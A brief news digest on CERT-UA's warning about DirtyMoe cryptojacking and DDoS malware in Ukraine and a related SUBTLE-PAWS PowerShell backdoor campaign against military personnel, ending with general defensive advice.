February 4, 2024 at 12:19PM
CERT-UA has warned of over 2,000 computers in Ukraine infected with DirtyMoe malware, attributed to threat actor UAC-0027. The malware conducts cryptojacking and DDoS attacks, and is propagated through Purple Fox and fake software installers. Another campaign known as STEADY#URSA targets Ukrainian military personnel with a PowerShell backdoor. Gamaredon is linked to Russia’s Federal Security Service.
Key takeaways from the meeting notes on the NewsroomCryptojacking/Malware are:
1. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of malware called DirtyMoe infecting over 2,000 computers in the country and attributed the campaign to threat actor UAC-0027. The malware is capable of cryptojacking and DDoS attacks.
2. Purple Fox and SUBTLE-PAWS were mentioned as related malware, with SUBTLE-PAWS being linked to an ongoing phishing campaign targeting Ukrainian military personnel.
3. SUBTLE-PAWS uses advanced techniques, including executing malicious payloads dynamically and storing/retrieving executable PowerShell code from the Windows Registry to evade detection and maintain persistence on infected systems.
4. It’s recommended that organizations keep their systems up-to-date, enforce network segmentation, and monitor network traffic for any anomalous activity.
For more exclusive content, follow us on Twitter and LinkedIn.